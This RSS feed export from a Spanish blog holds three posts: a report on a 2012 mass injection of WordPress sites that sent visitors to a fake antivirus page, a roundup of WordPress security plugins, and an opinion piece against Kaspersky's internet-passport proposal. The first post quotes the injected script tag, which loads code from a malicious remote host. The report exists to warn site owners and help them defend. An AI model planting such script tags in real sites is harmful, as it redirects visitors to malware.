<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>CiberPrensa &#187; Virus</title>
	<atom:link href="http://ciberprensa.com/tag/virus/feed/" rel="self" type="application/rss+xml" />
	<link>http://ciberprensa.com</link>
	<description>La evolución de los medios en la red</description>
	<lastBuildDate>Sat, 26 May 2012 00:08:27 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>Inyección de código en WordPress – antivirus falso</title>
		<link>http://ayudawordpress.com/inyeccion-de-codigo-en-wordpress-a-traves-de-un-falso-antivirus/</link>
		<comments>http://ayudawordpress.com/inyeccion-de-codigo-en-wordpress-a-traves-de-un-falso-antivirus/#comments</comments>
		<pubDate>Tue, 06 Mar 2012 21:39:37 +0000</pubDate>
		<dc:creator>Agencia</dc:creator>
				<category><![CDATA[Agencia]]></category>
		<category><![CDATA[antivirus]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Virus]]></category>

		<guid isPermaLink="false">http://ayudawordpress.com/?p=60966</guid>
		<description><![CDATA[En Websense Security Labs han avisado de que hay más de 30.000 instalaciones de WordPress ya infectadas mediante un troyano que añade código de redirección en la web afectada. Los sitios infectados tenían versiones no actualizadas de WordPress, contraseñas inseguras y plugins vulnerables. El código que inyecta se coloca antes de la etiqueta  y suele ser algo así: Tras una cadena de redirecciones de tres niveles las víctimas aterrizan en un sitio de antivirus falso. El antivirus de pega parece realizar un escaneo del ordenador y avisa al usuario mostrando detecciones de malware falso de varios &#8230; <a href="http://ayudawordpress.com/inyeccion-de-codigo-en-wordpress-a-traves-de-un-falso-antivirus/">Sigue leyendo que hay m&#225;s <span>&#8594;</span></a><p></p>]]></description>
			<content:encoded><![CDATA[<p>En <a href="http://community.websense.com/blogs/securitylabs/archive/2012/03/02/mass-injection-of-wordpress-sites.aspx" >Websense Security Labs</a> han avisado de que hay más de 30.000 instalaciones de WordPress ya infectadas mediante un troyano que añade código de redirección en la web afectada.</p>
<p>Los sitios infectados tenían versiones no actualizadas de WordPress, contraseñas inseguras y plugins vulnerables.</p>
<p><span id="more-60966"></span></p>
<p>El código que inyecta se coloca antes de la etiqueta <code>< / body ></code> y suele ser algo así:</p>
<pre class="brush: xml; title: ; notranslate">&lt;/div&gt;&lt;!--End-body-wrapper--&gt;
&lt;script src=&quot;http:// ionis90landsi.rr.nu /mm.php ?d=1&quot;&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;</pre>
<p>Tras una <strong>cadena de redirecciones de tres niveles</strong> las víctimas aterrizan en un <strong>sitio de antivirus falso</strong>. El antivirus de pega parece realizar un escaneo del ordenador y avisa al usuario mostrando <strong>detecciones de malware falso de varios tipos de troyanos</strong>. La página parece una ventana del explorador de Windows, con el título de &#8220;<em>Windows Security Alert</em>&#8220;. </p>
<p><a href="http://ayudawordpress.com/wp-content/uploads/2012/03/antivirus-falso-troyano-wp.png" rel="shadowbox[sbpost-60966];player=img;"><img src="http://ayudawordpress.com/wp-content/uploads/2012/03/antivirus-falso-troyano-wp-500x334.png" alt="" title="antivirus falso troyano wp" width="500" height="334" class="aligncenter size-medium wp-image-60969" /></a></p>
<p>El proceso falso de escaneo <strong>parece una aplicación Windows</strong>, pero en realidad es una simple ventana emergente del navegador. Luego, el falso antivirus pide al &#8220;visitante&#8221; que descargue y ejecute una herramienta antivirus que &#8211; supuestamente &#8211; ha encontrado los troyanos. <strong>El ejecutable mismo es un troyano</strong> ¿qué esperabas?.</p>
<p>La mayoría de los sitios infectados están en los EEUU como puedes ver en este tráfico:<br />
<a href="http://ayudawordpress.com/wp-content/uploads/2012/03/sitios-infectados-antivirus-falso-wp.png" rel="shadowbox[sbpost-60966];player=img;"><img src="http://ayudawordpress.com/wp-content/uploads/2012/03/sitios-infectados-antivirus-falso-wp-500x212.png" alt="" title="sitios infectados antivirus falso wp" width="500" height="212" class="aligncenter size-medium wp-image-60968" /></a></p>
<p>Y los visitantes a la página falsa ya son de un montón de países, todos angloparlantes:<br />
<a href="http://ayudawordpress.com/wp-content/uploads/2012/03/visitantes-falso-antivirus-wp.png" rel="shadowbox[sbpost-60966];player=img;"><img src="http://ayudawordpress.com/wp-content/uploads/2012/03/visitantes-falso-antivirus-wp-500x218.png" alt="" title="visitantes falso antivirus wp" width="500" height="218" class="aligncenter size-medium wp-image-60967" /></a></p>
<p>¿Recomendaciones?</p>
<ul>
<li>Actualiza WordPress a la última versión siempre</li>
<li>Usa solo plugins y temas seguros</li>
<li>No uses contraseñas sencillas</li>
<li><a href="http://ayudawordpress.com/asegurando-wordpress-con-htaccess/" title="Asegurando WordPress con .htaccess" >Protege tus carpetas y archivos</a> de la instalación de WordPress</li>
<li>No alimentes el efecto <a href="http://www.urbandictionary.com/define.php?term=pebcak" title="Efecto pebcak" ><strong>pebcak</strong></a></li>
<li>Instala un buen antivirus si usas Windows</li>
</ul>
<p>Gracias a <a href="https://twitter.com/#!/buddypress_es/status/177117532795322370" >Jose</a> por avisar y a <a href="https://twitter.com/#!/zedejose" >Ze</a> y <a href="https://twitter.com/#!/bi0xid" >bi0xid</a> por las coñas marineras </p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/AyudaWordpress?a=S6nnFawcV7I:5UR97hV_aYk:Dsqc8YHEA1Y"><img src="http://feeds.feedburner.com/~ff/AyudaWordpress?i=S6nnFawcV7I:5UR97hV_aYk:Dsqc8YHEA1Y" border="0"/></a>
</div>
	<h3>Artículos Relacionados:</h3>
	<ul class="st-related-posts">
	<li><a href="http://ayudawordpress.com/los-3-modos-mas-comunes-de-hackear-wordpress-y-como-evitarlo/" title="Los 3 modos más comunes de hackear WordPress y cómo evitarlo (Miércoles, 23 de mayo de 2012)">Los 3 modos más comunes de hackear WordPress y cómo evitarlo</a></li>
	<li><a href="http://ayudawordpress.com/hosting-wordpress/" title="Hosting WordPress (Jueves, 17 de mayo de 2012)">Hosting WordPress</a></li>
	<li><a href="http://ayudawordpress.com/wordpress-3-3-2-actualizacion-de-seguridad/" title="WordPress 3.3.2, actualización de seguridad (Viernes, 20 de abril de 2012)">WordPress 3.3.2, actualización de seguridad</a></li>
	<li><a href="http://ayudawordpress.com/dos-administradores-en-cada-wordpress/" title="Dos administradores en cada WordPress (Jueves, 19 de abril de 2012)">Dos administradores en cada WordPress</a></li>
	<li><a href="http://tellado.es/seguridad-y-privacidad-estamos-seguros-en-internet/" title="Seguridad y privacidad, ¿estamos seguros en Internet? #SBS12 (Miércoles, 18 de abril de 2012)">Seguridad y privacidad, ¿estamos seguros en Internet? #SBS12</a></li>
</ul>

]]></content:encoded>
			<wfw:commentRss>http://ayudawordpress.com/inyeccion-de-codigo-en-wordpress-a-traves-de-un-falso-antivirus/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>15 maneras de asegurar WordPress</title>
		<link>http://ayudawordpress.com/seguridad-wordpress/</link>
		<comments>http://ayudawordpress.com/seguridad-wordpress/#comments</comments>
		<pubDate>Tue, 03 Jan 2012 13:14:13 +0000</pubDate>
		<dc:creator>Agencia</dc:creator>
				<category><![CDATA[Agencia]]></category>
		<category><![CDATA[Plugins]]></category>
		<category><![CDATA[antivirus]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Virus]]></category>

		<guid isPermaLink="false">http://ayudawordpress.com/?p=11280</guid>
		<description><![CDATA[Para empezar bien el año nada mejor que conocer varias maneras de mantener bien seguro nuestro WordPress. Para ello he realizado una selección de plugins que ayudarán a tener un WordPress seguro. Antes de entrar en detalles, debes tener en cuenta siempre estas recomendaciones básicas: Mantener WordPress actualizado a la última versión, única garantía de control de vulnerabilidades conocidas. Instalar solamente plugins seguros, a ser posible desde el repositorio oficial. Instalar solamente temas seguros, a ser posible desde el repositorio oficial. Revisar la sección de seguridad de Ayuda WordPress para comprobar que has realizado todas las acciones de seguridad necesarias. &#8230; <a href="http://ayudawordpress.com/seguridad-wordpress/">Sigue leyendo que hay m&#225;s <span>&#8594;</span></a><p></p>]]></description>
			<content:encoded><![CDATA[<p><img class="aligncenter size-full wp-image-11296" title="WordPress seguro" src="http://ayudawordpress.com/wp-content/uploads/2012/01/WordPress-seguro.jpg" alt="" width="410" height="410" /></p>
<p>Para empezar bien el año nada mejor que conocer varias maneras de mantener bien seguro nuestro WordPress. Para ello he realizado una selección de plugins que ayudarán a tener un <strong>WordPress seguro</strong>.</p>
<p>Antes de entrar en detalles, debes tener en cuenta siempre estas recomendaciones básicas:</p>
<ol>
<li>Mantener <strong>WordPress actualizado</strong> a la última versión, única garantía de control de vulnerabilidades conocidas.</li>
<li>Instalar solamente <strong>plugins seguros</strong>, a ser posible desde el repositorio oficial.</li>
<li>Instalar solamente <strong>temas seguros</strong>, a ser posible desde el repositorio oficial.</li>
<li>Revisar la <strong><a title="Seguridad WordPress" href="http://ayudawordpress.com/categoria/seguridad/" >sección de seguridad de Ayuda WordPress</a></strong> para comprobar que has realizado todas las acciones de seguridad necesarias.</li>
<li>Suscribirte al <a target="_blank" href="http://feeds.feedburner.com/AyudaWordPress" >feed de Ayuda WordPress</a> para estar informado de las <strong>alertas de seguridad</strong>.</li>
</ol>
<div>Hecho esto …  <strong>¡vamos a ello!</strong></div>
<div></div>
<div><span id="more-11280"></span></div>
<h2>1. <a target="_blank" href="http://wordpress.org/extend/plugins/bulletproof-security/" >Bulletproof security</a></h2>
<p><a href="http://ayudawordpress.com/wp-content/uploads/2012/01/bps.png" rel="shadowbox[sbpost-11280];player=img;"><img class="alignnone size-medium wp-image-11281" title="bps" src="http://ayudawordpress.com/wp-content/uploads/2012/01/bps-489x500.png" alt="bps" width="489" height="500" /></a></p>
<p>Este plugin ofrece un entorno de seguridad muy completo, protegiendo tu WordPress de inyecciones de código XSS, RFI, CSRF, Base64, así como de intenteos de hacheo por inyección SQL.</p>
<p>También hace comprobaciones de seguridad del prefijo de la base de datos, seguridad del fichero <code>wp-config.php</code> así como de las carpetas del núcleo de WordPress y ficheros <code>.htaccess</code>.</p>
<p>Es de los más completos, incluyendo además un editor de archivos de sistema.</p>
<h2>2. <a target="_blank" href="http://wordpress.org/extend/plugins/wp-security-scan/" >WP Security scan</a></h2>
<p><a href="http://ayudawordpress.com/wp-content/uploads/2012/01/wpsecscan.jpg" rel="shadowbox[sbpost-11280];player=img;"><img class="alignnone size-medium wp-image-11282" title="wpsecscan" src="http://ayudawordpress.com/wp-content/uploads/2012/01/wpsecscan-500x237.jpg" alt="" width="500" height="237" /></a></p>
<p>Antes de empezar realiza un análisis de tu instalación y te ofrece sugerencias para cambiar lo siguiente:</p>
<ol>
<li>Contraseñas</li>
<li>Persmisos de archivos y carpetas</li>
<li>Seguridad de la base de datos</li>
<li>Ocultar la versión de WordPress</li>
<li>Protección de la administración de WordPress</li>
<li>Quitar información del generador WordPress en el código de tu tema y de los ficheros &#8220;core&#8221;</li>
</ol>
<p>Bastante completo, aunque no tanto como el anterior.</p>
<h2>3. <a target="_blank" href="http://wordpress.org/extend/plugins/6scan-protection/" >6Scan Security</a></h2>
<p><a href="http://ayudawordpress.com/wp-content/uploads/2012/01/6scan.png" rel="shadowbox[sbpost-11280];player=img;"><img class="alignnone size-medium wp-image-11283" title="6scan" src="http://ayudawordpress.com/wp-content/uploads/2012/01/6scan-454x500.png" alt="" width="454" height="500" /></a></p>
<p>Es una de mis más recientes descubrimientos y me ha sorprendido gratamente.</p>
<p>6Scan hace un escaneo de tu WordPress para tratar de descubrir vulnerabilidades de seguridad &#8211; conocidas o no &#8211; y tratar de solucionarlas de manera automática.</p>
<p>Sus virtudes y funcionalidades son las siguientes:</p>
<ul>
<li>Patrol: El escaner Patrol de 6Scan imita las acciones de un hacker tratando de acceder e infectar tu sitio. Cada página, formulario y script de tu sitio es revised para detectar puntos débiles que puedan, potencialmente, convertirse en agujeros de seguridad. Patrol encuentra y te protege de:
<ul>
<li>Inyecciones SQL</li>
<li>Cross-Site Scripting (XSS)</li>
<li>Redirecciones de directorios</li>
<li>Insercciones de ficheros remotos</li>
<li>Y mucho más.</li>
</ul>
</li>
<li>Bodyguard: Este módulo actúa en tu servitor para tratar de solucionar todas las vulnerabilidades de seguridad encontradas por Patrol.</li>
<li>Actualizaciones constantes: Algo vital en un software de seguridad.</li>
<li>Instala y olvida: una vez instalas 6Scan Security no hay que hacer más, el se ocupa de mantener el sitio protegido.</li>
<li>Invisible: 6Scan Security no afecta al rendimiento del sitio ni interfiere con su funcionamiento normal.</li>
</ul>
<h2>4. <a target="_blank" href="http://wordpress.org/extend/plugins/wp-secure-by-sitesecuritymonitorcom/" >WP Secure</a></h2>
<p><a href="http://ayudawordpress.com/wp-content/uploads/2012/01/wpsecure.png" rel="shadowbox[sbpost-11280];player=img;"><img class="alignnone size-medium wp-image-11284" title="wpsecure" src="http://ayudawordpress.com/wp-content/uploads/2012/01/wpsecure-500x297.png" alt="" width="500" height="297" /></a></p>
<p>Uno de los plugins más veteranos, pero no por ello menos eficiente. Realiza 23 comprobaciones de seguridad en WordPress, y solo tienes 2 ventanas, una primera que te informa de las acciones de seguridad a realizar y otra que procesa todas las acciones para asegurar tu WordPress a tope.</p>
<p>El diseño de la administración del plugin deja mucho que desear pero funcionar funciona perfecto.</p>
<h2>5. <a target="_blank" href="http://wordpress.org/extend/plugins/ultimate-security-checker/" >Ultimate security checker</a></h2>
<p><a href="http://ayudawordpress.com/wp-content/uploads/2012/01/uschecker.png" rel="shadowbox[sbpost-11280];player=img;"><img class="alignnone size-medium wp-image-11285" title="uschecker" src="http://ayudawordpress.com/wp-content/uploads/2012/01/uschecker-500x387.png" alt="" width="500" height="387" /></a></p>
<p>Otro plugin veterano que hace bien lo que promete. Realiza comprobaciones de ficheros del núcleo de WordPress, así como de distintas vulnerabilidades conocidas.</p>
<p>Con una interfaz espartana hace bien su trabajo. Como &#8220;plus&#8221;, ofrece en la barra de admin un identificador de los puntos de seguridad de tu sitio, a modo de recordatorio de que puedes hacer algún arreglo para mejorar la seguridad.</p>
<p>Eso si, no ofrece interfaz para solucionar los errores sino enlaces para saber como hacerlo manualmente, quizás su mayor pega.</p>
<h2>6. <a target="_blank" href="http://wordpress.org/extend/plugins/htaccess-secure-files/" >htaccess secure files</a></h2>
<p><a href="http://ayudawordpress.com/wp-content/uploads/2012/01/htaccess-control.png" rel="shadowbox[sbpost-11280];player=img;"><img class="alignnone size-medium wp-image-11286" title="htaccess control" src="http://ayudawordpress.com/wp-content/uploads/2012/01/htaccess-control-500x388.png" alt="" width="500" height="388" /></a></p>
<p>Este plugin funciona de manera especializada sobre los ficheros multimedia de WordPress, permitiendo que solo usuarios con determinado perfil, capacidades o IP puedan acceder a los archivos que tu definas.</p>
<p>Para ello crea un fichero .htaccess en la carpeta de cada archivo protegido, que restringe el mismo a los usuarios o roles que hayas definido anteriormente.</p>
<p>Lo mejor es que puedes definir reglas generales en los ajustes del plugin o en cada fichero, al editar cada archivo de la Librería Multimedia de WordPress.</p>
<p>Especializado pero muy completo.</p>
<h2>7. WP plugin security check</h2>
<p><a href="http://ayudawordpress.com/wp-content/uploads/2012/01/pluginsec.png" rel="shadowbox[sbpost-11280];player=img;"><img class="alignnone size-medium wp-image-11287" title="pluginsec" src="http://ayudawordpress.com/wp-content/uploads/2012/01/pluginsec-500x168.png" alt="" width="500" height="168" /></a></p>
<p>Este es uno de mis imprescindibles, pues comprueba la parte más débil de nuestra instalación: los plugins de terceros.</p>
<p>Y es que el mayor agujero negro para cualquier instalación de WordPress son los plugins, y este sistema en concreto analiza cada plugin instalado para comprobar si contiene agujeros de seguridad o malas prácticas de programación que puedan comprometer tu instalación de WordPress.</p>
<h2>8. Better WP Security</h2>
<p><a href="http://ayudawordpress.com/wp-content/uploads/2012/01/betterwpsec.png" rel="shadowbox[sbpost-11280];player=img;"><img class="alignnone size-medium wp-image-11288" title="betterwpsec" src="http://ayudawordpress.com/wp-content/uploads/2012/01/betterwpsec-500x349.png" alt="" width="500" height="349" /></a></p>
<p>Muy similar a WP Secure, realiza las comprobaciones habituales para asegurar la instalación de WordPress. Una de las funcionalidades que más me gustan es el límite de intentos de acceso, bloqueando la IP del usuario &#8220;olvidadizo&#8221; o atacante.</p>
<p>Muy completo y actualizado, funcionando también en instalaciones Multisitio.</p>
<h2>9. <a target="_blank" href="http://wordpress.org/extend/plugins/secure-wordpress/" >Secure WordPress</a></h2>
<p><img class="alignnone size-full wp-image-11289" title="securewp" src="http://ayudawordpress.com/wp-content/uploads/2012/01/securewp.png" alt="" width="500" height="1266" /></p>
<p>Quizás uno de los más utilizados, por la gran cantidad de comprobaciones que hace y por su integración. Es muy completo, como una suite de seguridad que mantiene tu WordPress seguro.</p>
<p>Además de todos los escaneos que realizan algunos de los anteriores también revisa queries que pueden comprometer tu WordPress.</p>
<h2>10. <a target="_blank" href="http://wordpress.org/extend/plugins/wp-login-security/" >WP login security</a></h2>
<p><img class="alignnone size-full wp-image-11290" title="wplogin" src="http://ayudawordpress.com/wp-content/uploads/2012/01/wplogin.jpg" alt="" width="450" height="306" /></p>
<p>Si eres muy estricto con el acceso a la administración de tu WordPress WP login security te va a encantar.</p>
<p>Puedes &#8211; o no &#8211; crear una lista blanca de IPs que pueden accede a tu sitio y, en cada acceso, el sistema comprueba si la IP del usuario que trata de acceder está en esa lista blanca y, en caso contrario, manda un email al administrador del intento de acceso, bloqueándolo entretanto.</p>
<p>Si no has creado una lista blanca el sistema pregunta al Admin si permite el acceso, y recuerda la IP del usuario permitido para próximos accesos.</p>
<h2>11. <a target="_blank" href="http://wordpress.org/extend/plugins/askapache-password-protect/" >AskApache Password protect</a></h2>
<p><a href="http://ayudawordpress.com/wp-content/uploads/2012/01/askapache.png" rel="shadowbox[sbpost-11280];player=img;"><img class="alignnone size-medium wp-image-11291" title="askapache" src="http://ayudawordpress.com/wp-content/uploads/2012/01/askapache-260x500.png" alt="" width="260" height="500" /></a></p>
<p>Para locos por la seguridad, este plugin actúa como un muro de contención para cualquier tipo de ataque a tu WordPress pero sin tocar WordPress o su base de datos.</p>
<p>En su lugar usa la autentificación HTTP básica o, a tu elección, la autentificación HTTP Digest, que eliges en los ajustes del plugin.</p>
<p>Lo mejor de AskApache Password Protect es que actúa antes de llegar a tu WordPress, por lo que mantiene libres de accesos indeseados, incluso de spam, tu WordPress.</p>
<h2>12. <a target="_blank" href="http://wordpress.org/extend/plugins/wangguard/" >WangGuard</a></h2>
<p><a href="http://ayudawordpress.com/wp-content/uploads/2012/01/wangguard.gif" rel="shadowbox[sbpost-11280];player=img;"><img class="alignnone size-medium wp-image-11292" title="wangguard" src="http://ayudawordpress.com/wp-content/uploads/2012/01/wangguard-500x334.gif" alt="" width="500" height="334" /></a></p>
<p>Un viejo conocido del blog, este plugin creado por Jose Conti elimina los indeseables Splogs de nuestra instalación de WordPress multisitio.</p>
<p>En la última versión ha mejorado enormemente su motor de detección, haciendo de este plugin un imprescindible en cualquier BuddyPress y WordPress multisitio, y tan completo que la lista de funcionalidades &#8211; incluidas estadísticas &#8211; es prácticamente eterna.</p>
<h2>13. <a target="_blank" href="http://wordpress.org/extend/plugins/private-wordpress-access-control-manager/" >Private WordPress accesss control</a></h2>
<p><a href="http://ayudawordpress.com/wp-content/uploads/2012/01/private.png" rel="shadowbox[sbpost-11280];player=img;"><img class="alignnone size-medium wp-image-11293" title="private" src="http://ayudawordpress.com/wp-content/uploads/2012/01/private-500x375.png" alt="" width="500" height="375" /></a></p>
<p>Si quieres controlar el acceso a tu WordPress, o a partes del mismo, este es tu plugin. Desde su pantalla de ajustes puedes controlar que perfiles accederán a categorías, páginas, entradas, tags o incluso feeds.</p>
<p>Muy completo y personalizable.</p>
<h2>14. <a target="_blank" href="http://wordpress.org/extend/plugins/login-lock/" >Login lock</a></h2>
<p><a href="http://ayudawordpress.com/wp-content/uploads/2012/01/loginlock.jpg" rel="shadowbox[sbpost-11280];player=img;"><img class="alignnone size-medium wp-image-11294" title="loginlock" src="http://ayudawordpress.com/wp-content/uploads/2012/01/loginlock-282x500.jpg" alt="" width="282" height="500" /></a></p>
<p>Este es otro de mis imprescindibles. Y es que si quieres que WordPress gestione los accesos de administración de manera profesional en este plugin encuentras todo lo necesario.</p>
<p>Puedes controlar los accesos por …</p>
<ul>
<li>Límite de tiempo entre intentos de acceso</li>
<li>Cantidad de intentos de acceso</li>
<li>Obligar al cambio de contraseña tras un tiempo determinado</li>
<li>Definir un mínimo de caracteres para las contraseñas</li>
<li>Exigir contraseñas seguras (con números, letras y caracteres adicionales)</li>
<li>Evitar contraseñas repetidas</li>
<li>Forzar el &#8220;logout&#8221; tras un tiempo definido</li>
</ul>
<p>Muy completo y fácilmente personalizable en la pantalla de ajustes del plugin. Como te digo, imprescindible si tienes un sitio con muchos usuarios registrados o eres exigente con la seguridad.</p>
<h2>15. <a target="_blank" href="http://wordpress.org/extend/plugins/antivirus/" >Antivirus</a></h2>
<p><a href="http://ayudawordpress.com/wp-content/uploads/2012/01/wpantivirus.png" rel="shadowbox[sbpost-11280];player=img;"><img class="alignnone size-medium wp-image-11295" title="wpantivirus" src="http://ayudawordpress.com/wp-content/uploads/2012/01/wpantivirus-500x375.png" alt="" width="500" height="375" /></a></p>
<p>Ninguna guía de seguridad estaría completa sin un buen antivirus, y WordPress también tiene plugin de antivirus, y bastante completo.</p>
<p>Antivirus realiza comprobaciones de manera habitual, y por supuesto nada más instalarse, en los archivos de tu tema, plugins y base de datos, para encontrar posibles inyecciones maliciosas y limpiarlas.</p>
<p>Si lo deseas, también te envía email con los resultados de la comprobación diaria, y hasta te ofrece alertas antivirus en la barra de Admin.</p>
<hr />
<p>Bueno, y hasta aquí mis recomendaciones. También te dejo con una lista secciones de artículos de seguridad que he publicado anteriormente, que completarán tu <strong>guía de seguridad WordPress</strong>:</p>
<ul>
<li><a href="http://ayudawordpress.com/categoria/seguridad/">Categoría Seguridad</a></li>
<li><a href="http://ayudawordpress.com/tag/seguridad/">Etiqueta Seguridad</a></li>
<li><a href="http://ayudawordpress.com/tag/htaccess/">Etiqueta htaccess</a></li>
</ul>
<p>Y si se te ocurre algo más ahí tienes los comentarios para ampliar la guía.</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/AyudaWordpress?a=rjaY4oxiEG0:8kDGrXXgzuQ:Dsqc8YHEA1Y"><img src="http://feeds.feedburner.com/~ff/AyudaWordpress?i=rjaY4oxiEG0:8kDGrXXgzuQ:Dsqc8YHEA1Y" border="0"/></a>
</div>
	<h3>Artículos Relacionados:</h3>
	<ul class="st-related-posts">
	<li><a href="http://ayudawordpress.com/los-3-modos-mas-comunes-de-hackear-wordpress-y-como-evitarlo/" title="Los 3 modos más comunes de hackear WordPress y cómo evitarlo (Miércoles, 23 de mayo de 2012)">Los 3 modos más comunes de hackear WordPress y cómo evitarlo</a></li>
	<li><a href="http://ayudawordpress.com/hosting-wordpress/" title="Hosting WordPress (Jueves, 17 de mayo de 2012)">Hosting WordPress</a></li>
	<li><a href="http://ayudawordpress.com/wordpress-3-3-2-actualizacion-de-seguridad/" title="WordPress 3.3.2, actualización de seguridad (Viernes, 20 de abril de 2012)">WordPress 3.3.2, actualización de seguridad</a></li>
	<li><a href="http://ayudawordpress.com/dos-administradores-en-cada-wordpress/" title="Dos administradores en cada WordPress (Jueves, 19 de abril de 2012)">Dos administradores en cada WordPress</a></li>
	<li><a href="http://tellado.es/seguridad-y-privacidad-estamos-seguros-en-internet/" title="Seguridad y privacidad, ¿estamos seguros en Internet? #SBS12 (Miércoles, 18 de abril de 2012)">Seguridad y privacidad, ¿estamos seguros en Internet? #SBS12</a></li>
</ul>

]]></content:encoded>
			<wfw:commentRss>http://ayudawordpress.com/seguridad-wordpress/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Pasaporte para acceder a Internet</title>
		<link>http://ciberprensa.com/pasaporte-para-acceder-a-internet/</link>
		<comments>http://ciberprensa.com/pasaporte-para-acceder-a-internet/#comments</comments>
		<pubDate>Fri, 05 Sep 2008 23:36:23 +0000</pubDate>
		<dc:creator>Fernando</dc:creator>
				<category><![CDATA[Actualidad]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Opinión]]></category>
		<category><![CDATA[Sociedad]]></category>
		<category><![CDATA[antivirus]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Mac]]></category>
		<category><![CDATA[ThinkTank]]></category>
		<category><![CDATA[Virus]]></category>

		<guid isPermaLink="false">http://ciberprensa.com/?p=2746</guid>
		<description><![CDATA[El bueno de Eugene Kaspersky se ha lucido. En una reciente entrevista en San Petersburgo, el dueño de la empresa de antivirus Kaspersky Labs, ha declarado que habría que establecer algún tipo de pasaporte obligatorio para acceder a Internet y, de este modo, evitar el acceso a la red de la mayoría de los ciberterroristas. [...]]]></description>
			<content:encoded><![CDATA[<p>El bueno de <strong>Eugene Kaspersky</strong> se ha lucido. En una reciente entrevista en San Petersburgo, el dueño de la empresa de <a href="http://ciberprensa.com/tag/antivirus/" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con antivirus">antivirus</a> Kaspersky Labs, ha declarado que <strong>habría que establecer algún tipo de pasaporte obligatorio para acceder a Internet</strong> y, de este modo, evitar el acceso a la red de la mayoría de los ciberterroristas.</p>
<p style="text-align: center;"><a href="http://ciberprensa.com/wp-content/uploads/2008/09/eugene_kaspersky.jpg" rel="shadowbox[sbpost-2746];player=img;"><img class="aligncenter size-full wp-image-2747" title="eugene_kaspersky" src="http://ciberprensa.com/wp-content/uploads/2008/09/eugene_kaspersky.jpg" alt="" width="480" height="290" /></a></p>
<p>No contento con tamaña barbaridad <strong>también ha propuesto la creación de una especie de Interpol de la Red </strong>que vigilara los usos de la Web, de hecho ha declarado que estaría dispuesto a transigir con su privacidad si así consiguiera eliminar el spam y los <a href="http://ciberprensa.com/tag/virus/" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Virus">virus</a>.</p>
<p><span id="more-2746"></span></p>
<p>Vamos a ver, <strong>querido Eugene, ¿te parece que ganas poco con tus aplicaciones de Antivirus como para hacer campaña gratuita a los poderes fácticos que buscan poner cerco a Internet?</strong>. En este tipo de declaraciones hay gente como el señor Kaspersky que, a pesar de vivir de la red, olvidan algo fundamental, y es que <strong>no se puede demonizar un medio por el uso que se haga del mismo</strong>. Y siempre atacan al mismo medio.</p>
<p>Empiezo a estar un poquito <strong>harto del trato que se da a Internet por parte de los medios tradicionales</strong>, donde solo es noticia cuando hay algo malo que decir de la red. Y ahora, <strong>este impresentable</strong> a sueldo de alguna agencia de control social, algún ThinkTank de esos que tan de moda están &#8211; porque sino no se explica &#8211; viene a meter mas miedos y hacer suyas las propuestas que los gobiernos de varios países han lanzado desde hace años para <strong>intentar controla la red</strong>.</p>
<p>Casi es mas flagrante la propuesta de <strong>obligar a instalar antivirus</strong> (adivina la marca) por parte de este señor y otros cuantos amiguetes del mismo negocio, forzando a instalar una especie de máquinas virtuales en las cuales la información estuviera como enjaulada … para proteger al usuario de ataques indeseados.</p>
<p><strong>¡Atención, señor Kaspersky!</strong>. Utilizo <a href="http://ciberprensa.com/tag/mac/" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Mac">Mac</a>, un sistema operativo seguro, en el que no necesito &#8211; ni utilizo &#8211; software antivirus desde hace años y NUNCA me ha infectado ningún virus ni troyano. <strong>Hay miles de usuarios que, como yo, utilizan Mac OS X y distribuciones de Linux que tampoco requiren de sus no-altruistas servicios y &#8220;opiniones&#8221;. </strong></p>
<p>Así que mejor que venda su producto pero que <strong>nos deje a los usuarios en paz y libres de sus teorías opresoras, solo comprensibles en una mente controladora y dictatorial</strong> … como la suya.</p>
<p>¡Lo que hay que <a href="http://www.elpais.com/articulo/red/Eugene/Kaspersky/propone/exigir/pasaporte/acceder/Internet/elpeputeccib/20080904elpcibenr_1/Tes/">leer</a>!</p>

	<h3>Artículos Relacionados:</h3>
	<ul class="st-related-posts">
	<li><a href="http://ayudawordpress.com/wordpress-se-simplificara-radicalmente/" title="WordPress se simplificará radicalmente (Jueves, 24 de mayo de 2012)">WordPress se simplificará radicalmente</a></li>
	<li><a href="http://ayudawordpress.com/hosting-wordpress/" title="Hosting WordPress (Jueves, 17 de mayo de 2012)">Hosting WordPress</a></li>
	<li><a href="http://ayudawordpress.com/varnish-y-wordpress/" title="Varnish y WordPress (Jueves, 10 de mayo de 2012)">Varnish y WordPress</a></li>
	<li><a href="http://ayudawordpress.com/wordpress-es-el-rey-de-la-web-en-espana/" title="WordPress es el Rey de la web en España (Sábado, 7 de abril de 2012)">WordPress es el Rey de la web en España</a></li>
	<li><a href="http://tellado.es/mis-7-principales-errores-como-blogger/" title="Mis 7 principales errores como blogger (Martes, 13 de marzo de 2012)">Mis 7 principales errores como blogger</a></li>
</ul>

]]></content:encoded>
			<wfw:commentRss>http://ciberprensa.com/pasaporte-para-acceder-a-internet/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Los Virus Windows invaden el Espacio Exterior</title>
		<link>http://ciberprensa.com/los-virus-windows-invaden-el-espacio-exterior/</link>
		<comments>http://ciberprensa.com/los-virus-windows-invaden-el-espacio-exterior/#comments</comments>
